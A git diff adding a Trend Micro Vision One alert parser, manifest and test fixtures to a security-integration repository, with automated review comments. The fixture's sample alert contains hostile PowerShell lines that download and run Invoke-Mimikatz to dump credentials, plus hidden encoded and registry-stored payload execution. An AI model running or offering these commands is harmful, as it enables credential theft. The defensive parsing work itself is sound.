zUJm*<6G9OwzaIUM{4J_0m0Lo+d>#BfqRzH|#B5J5a58q3lY)fbUr|2UwX7=@D(=6q z8a9hW1R;$@0?LXax>P#AF>&}e(*@|I-|yhXeCN#>hg!r#ji)+1Sv2oHIv&Fgovn0i z#)nt9-!@%z|K00=M`>!MQi3e{I)nfvVbWpsjZcI^+Qx!-qOE$1>7#Zm*0ir#X`%#M z+J+=bfu+mz&NTxjc<*=3vQPbYy(Nj3`tH4t2h8E+iX9kPdkmYF@%$3>U5+uG&NzVby{qQI43rY~2e+>c zdwuHgEryobX_Q5<7c;+66f#On+3UTx#pR33kX@URf!qj=i&jku0^24;DL`m2D1?4Bs^dO}WCbDa z6+Hav6YQ($YA1sPPPA0OIjZm=-_c?Wb9jaob87p?^RD2`nAWG+Obhn>*?}+$q+ksX z{l2eSL(_CEJj|xo%s3+aO(0M(+U_d0K(#$>yEM!omT$PfXRimTM;5lHH?0`xS($dr z#k?15vk`b&$U`U_?;_wv*60`o?7L=PZDK+Ud_>n5;T( zO@Z3>Z^sFuxHMaE-Xw@)_;Gj+K zp2@L4J}PaJj5e(LMNriOJQ(aHhOaP(Sdlig2AF*|j#(F3riwTs#yi(bZx;KfKM#_= z0f!I10ynb`Vf7 z4)CUhtxRsj)yVEJ{JPuGUb}PA>o0TFsyND{K~INR8c;Z0%O_OO1=%wj&Qlls@A>^ zk%|V9FD=}lNSlseNTUidS?x{y7ws>&7#ecgC=UV-Y(_196p50dOY$*;i zgCyq96pP*$K@HLGv`4~T9-F9HJTX(UA(k-~_oCX%zj^gZN3(u{11A@C7_T8bkX^?OE=BP7_u>N$BKKpb7?|3VG5co+zl+w4xG#>$w{gk->z;rsRjq1> zV%`yW)P^IKDM=S6MKE064w#4Y>@W{uV$NQQMC>Q-=}#cQ4}|FRtxUTLx59`#&93ux zECyac80F1Vceq1N5=JG?=ax22%*3~lIYGNGPo@MU{dln1BRQNIzfDtUrfK^9os|79 zS>yTa38Q>K>wNppMf5{1;GKy2>vK3dz`y$P?vpwR4o3M73T>A;QF=maut~!&sdc#U 
zUw(_upXTN7GseQ3EKWA7Uz_Ib$d1F&oxu}6zpiK)BZs18lK_%#KEhJD9u}sOzbkXa z{TAL1cj7Q^^5dazk&+^AmU`fUzbUa%ccOIYuXH5wNo8B5%?Uf-%ah7Q|GQx0zivsm z1Kg?Ufvk3pMD9ZNz<%uzwiG2MivDJMaB9+pJ@Qkko1)DG-Y7@S5FvJD8x--&cky`tN4%EB}0Uq1)w>7NnXsHRj+U6wnk?9UhC z@X(WXL{5 zl?BmSBDm%rWOwiz=8YWb6Tp8h5*DWivGA4pNdc26Z|CMsejFnoNNm)-zR}~+k!5K6W%3;cq*PdRu@2eZ8JL; z{Iv82EwSo35735iDQJEA);ccao3j^rg#`O5jIglG10bisp}DR zPiTP}y|aJtv^>s4?W~>W(s=}v2iU@EX)&y+xybX1oC;{#u!+leg?I;LehMoePk(g+ z8{U$juF{n?>-JdRlbYRHJli081PY*nvc`#tOXFm-Q9G3VCqF&Owr-d z>7tbH;>N$m#?((gi={Isfhpz^mWy7;D;f6_i-I!g^m0l{yzKaupZbD&zI<{u4)jQ@ zk6RH33JN>nD+i)9u30odz5ze?3_5;Q_42>JQ+HsYvF@CJHMsGZ%Ai;v(1jUz4NcUp(>6#N=8SLigcg`j5TnVqWkqYgU9AG*y&!(=~P4xdE)BP#EV8!!| zKiD_nmwDz?K#7k_KDIWE#Cy#4sXQT6 z(ZDI>CmUkfPT6Aqc-1vOIV3>4F?_|Qx>80)u5B}S&px~_TGPAc-^ zUnV1?XLD?6TzeJ98s^h&pLe=NpHQK%E<6+- z3TmC7dy6A3hO)vAc$7@oK$oQ%V(`*8siMcPncg*M-WvFbfImWfIYvp*OM+vP6m47? z^i9koOnwLd%FHjsRugp%>w)kD;t;GhH5$_&duJPmLz(^IE9Ad!6akVqxR#}62y=_( z$be0+%AV7a#da2>|TlZ@}i9uzIhe2dUDK9zhBi3Go4|JXRQOl6Rw|&B+)ix`oCR%_FQBWs+VJ zez>%QPx$s>h2mwp9PP8js*LTOs?B#PJ$C1Ty<4RW19_FL3Ccxz-8;!N2j*o|FhN8r z(Y%LJ2OtjnSsk^c;DhL7ueR&APGPp3-X4v->8P=Fl@1i2(HI@&qm_2{awCfuuz~2^ z<|6Z^Lw-8}67C?J@+QJTP^y9sS5ozhp=*_Y%H*fcqbDIsUF;b;GISKNC31~O+-Jv$ z@6G?9Iz?It;r&Pkp55U0K9urBprGK-#^s6ZZa$WCZFSFv(hOt8i$~h1;K@04l>$a( zv&Tfcq24(Vd;n|xVEIYt1&cA9A_jfNp`mX=-onw+TPR?i62(fKI5X*yVpw6_>L`-- z$1eU7Y1K%i#Wva6!ZMZ#0^KhDGrQ4jfYDe!#qPcMshoFeT6=Le-N0@F?pIkfuY4U~ zX?w<1_Xf4smtWgs8$D2{v!uXq+12;`(4gC!OK0o5jnCb(_uI;XJURKa!tDEFnCVsa zeO#_of{fsbSd{M&K7oL!Z&fp`rLxG!-;~i0<46g9{;Z2OTvVyhk-7gRtZ_-n z)+K6Q{t{O81zk{xTrFl0Y30MUt2Wk#rOXD}w?imnG-PpGva`qIM+vu90T$=FT+EmY znS78dH%8TeHo&C7zaO$rDw*y@G#3t^M)BUnuZEH9Rwl4C@FNQC#0S3p-R&OASc3vY zwLV-nwm$pqrqW!y%7_VpbxcOm4!!k}Ns-V!6YN4#s$*V(17;DJap0jHs7cB@ry#pyaaS`W3dWCha~; z>oL(iuCf;glmIPioYcjpST#LmD#9b#n~`FCI_k#33s zN!-P^5pI|9HGUoL?&EfTFE&F6Bfa|11EZGfhdTiZ+Hbq!RtT4ycnv8gDvq6V;I-6k5mzXBJj>eg zuKhv;t@})6&lZNkALAS8LZlI&yKY=t)0@ldDu`24+RFQd>mg$*&})%+{Shm^Pbp%M 
zUX2WP9hXVked$)1`gvj6FjM;JH#wLB7M747bFAPwsYJhviUT*drR16>cBKn@>^`x6 zy<9hARqZ@bH`3WQ*no<|7#Gm;BrMI9bW1L z3;e3X8c>Fid+J(pb1y9qrzG`rQdv^o=XHidx}&Gc1;nR-M>;lvo>L-9;0b&^8~L#L zJ{OWWbMDi4{mcVxtc>@;P~(7X6W(HuHuFR2!cTw2h@9apip?u_-^2ZYf}?Mc1nr`9f#J(@5A3uTRYl%V=I|U zCx!keqP?a}usPrv%Fb+=BRF^vvw;F)_*6d-#Ls#V7)L}*&TRj6VA=st1eC-?u~nqp>Tc5BZpNGOSrwgXj0 zyd;Ht8%80~Sfd{AOKN@4q{Xe6^0B+PM~SKLLgJ{27!~nCsWMz>{m@D-Y`2~>`#=R+ zSm!waK>bV)^Jf#BjKq0f`lUzm+$YsIw?L7BV`w3G%n(?*AODKp-t-N{zws8|mn~|g zksNgNJCU+qAj~Y33rc#@-X~&FdNXy1PAg$%D1+FU%lAY37F!QjD^qks(Ah;VJ>#r; zRWLrxYTwHY&uSQdyQbMK-{5)wEeTMZKykOU%+YsIn)tIwFzW z#miDTR%75c?w1V_9`;pkl7Iq!KTUobe+8NQ)sE%v@Ro}jbmI_j0zne+@-tLt$~=`! z0<{n%(Iri=f;KlbxUenjUCa_ZFoye^DXQGIzsD>Bwd6R5i#HvyNo5_e`h>WdTbr zOvW$9v26QmKp24zNi*TafH02~218DJ zrB3%G|3$oy)|$FBzIlHdU>;Tc1M`(@q8&vr8z~q}M+G{;xfpOhJ|97*dPQQgP}vgT ze-FYrxoc-;BDoy{x+)`PXkI9Tn#B>fjK)yOAap2Uk+e**s$i@l^3C`^FRD#L!v{o`8k714T z<*~-l@{Q4xoK71XS41DR2Spx43#g@_8$Zcn!lLqnl6eFXcRd3`bvY>}!3hHKC? zyrQ(;KS;M$NG1-G0+R4Feg-1w>hi0o!bcqhMZ#X7ZvEB}3rHehv|-WFq4-dzeHCb< zM<8>bOP0UEK$|0(eG4N|!OpmcEURoCss*B)m8eI)tb+P(x^WSeBKx?yT>HT+!X`pd zZ>WL8!|q9bVHoD!`H4Yj&Hv?TW`0yS#F$} zW~4*R7ylsdOe$<`)|$|DpEq9!+gl9wbW(NgqTle*=Nr8j1ByC}l1lkp;DFHv%$KOX zTKu#ya`Sa~^zclwb5(av`YJ|vCc=qEtr3YH+Cs$ZJ6Gc&mzUGWav`VgQ&q-K{ti?J zV1Pwzn!Boh)GRLr_TPNm-RF4GhdosiPO5hg4QoQ;QlS}Xug25h?0=27eQeT z{Lp)YiR+U;I?J)T*tyMQEEvk6#OjKlcWm`-`LnMIIZ(_^1O$wL!NCMT=R=&i4CJg9 z8u|-Il_}1OI+P9NL+o2tP(^umC(mo3p#c_XlcW6Q|Lc-}E~p|X=e2wunThm_xG;Pp zBU3D@cBy}mbyBn3b76Rf_Oug0QAmUPSREI=In9TJ6zEaX7i77RhT5u#{`hc}iCw_% zC$&7XU3wO1p&W6vkj=Ykijqumz=_Jd8k6xHCWW-Re`V3?eFRb=Em+j--e8!6)L?fL zY3luaKQmU!4Nf|GTg1X+N}inE!ECh>3zrug_kU!|RdGjlaSaZh?lpo9}pCO-<)I@Ot@x+8`@#9xX;u z2hnHaUg6@vR-^b{AxU%oqU8aYB=^w)--Zv4RRS_rJ89QwxcHD1dNUWipa3XV_snqHQe z4o_-AHD&Qa`=B^K_lqR@tII$AHd6TCm`vw6iTWGzk7G#mj5ibzkop9djZ~c8D{17F ze1vM50L1o(G(DHe+Mib z+17*wrp1#y>g3we${`O@rHPR|mEfreBszs$1p#MM@!PJ!rbc`qb)C}LD!|-r2tUyR zLF`kYJP{C- zEn-hiWbh`_4;?|rg8(=$Q+iB`hr>e~zoa9ZdK6%#G6NV2_`Z-?K6ti;qq6> 
z`6BS4kVhUA0n)}3#D6xRbo8sfQWYkZmZqWFR!67eB-ag$-*9|4MBxzHWZ+H$F|?5K zU;45!R^c&KwVReE(aYZSuvC}agUFX7(GIZlN7Dtk-5^52Zp%q%T}6L_XQ5&wd01GK z(*;y=|6|`dh#A)W+h~W`s^x33;?EdSZoE#HEY4yUd8C<4LHuK5JR9-u)LQ<)E8RjHyp5IKzaGQIM8+`c5{i z5!c8?MR)vu1ULFHxFthnWlwq*j&dbAKPM(Af8FcjfR3q;<&g8-h73b!Nrv&7GRBA+Mx&_d5!3<;Lo|k`0ph@i$ZK3G+

&TK3Duv5*A4Ija_Ed-Y6DL%i=Rf6O9%7c&oV3QVzYec;S~R+&b=_ryMnpVz{L% zQkK5RWZP)=$c> zVPjH6Tj}&V$t#)BWi&ogBOc>iK?kk7>s`YkMz+Cy0e2rG9io1|>J^S!7 wM>ZBJ6Qe~@DrfdBvi literal 0 HcmV?d00001 diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml new file mode 100644 index 000000000..c0121a28d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -0,0 +1,9 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +name: Trend Micro Vision One +slug: trend-micro-vision-one + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json new file mode 100644 index 000000000..e69de29bb diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml new file mode 100644 index 000000000..38a31dd29 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
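Review bot: In the manifest hunk, `data_sources` ends with the bare key `Process monitoring:`, which a YAML loader reads as a `null` value; if the manifest schema expects a mapping entry with an empty value this is fine, otherwise `Process monitoring: {}` or a short description string avoids the ambiguity. The parser in the same commit also maps `registry.*` fields and ships a registry fixture (tests/test_registry.json), so the data-source list looks incomplete relative to what the format handles — presumably a registry-related source should be listed too, to be confirmed against the taxonomy this repository uses.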
@@ -0,0 +1,79 @@ +name: trend-micro-vision-one +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.model.workbenchLink}}" + + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 
'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + # @todo should be along with registry.data.type to REG_SZ + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + 
process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json new file mode 100644 index 000000000..5eca6b2ea --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json 
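Review bot: `rule.id: "{{parsed_event.message.model.modelId}}"` and `event.url: "{{parsed_event.message.model.workbenchLink}}"` dereference attributes of `model`, but in the payload shown by tests/test_process.json and tests/test_registry.json `model` is a plain string and `modelId` / `workbenchLink` are top-level siblings, so both fields are silently never set — the expected output in test_process.json indeed contains `rule.name` but neither `rule.id` nor `event.url`. Change them to `rule.id: "{{parsed_event.message.modelId}}"` and `event.url: "{{parsed_event.message.workbenchLink}}"` and add the two keys to the fixture expectations. `process.pid` is taken from the `objectPid` indicator while `process.command_line` and `process.executable` come from `processCmd` / `processFilePath`; if the `object*` and `process*` indicators describe two different processes, as the naming suggests, the pid is attached to the wrong one — confirm against the vendor schema before keeping it. The alert `description` and the `objectCmd` indicator present in the fixtures are not mapped to any field, so `message: "{{parsed_event.message.description}}"` would be a minimal, useful addition.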
@@ -0,0 +1,66 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], 
\"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": 
[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", 
\"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows 
update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + 
"command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json new file mode 100644 index 000000000..093876a30 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json 
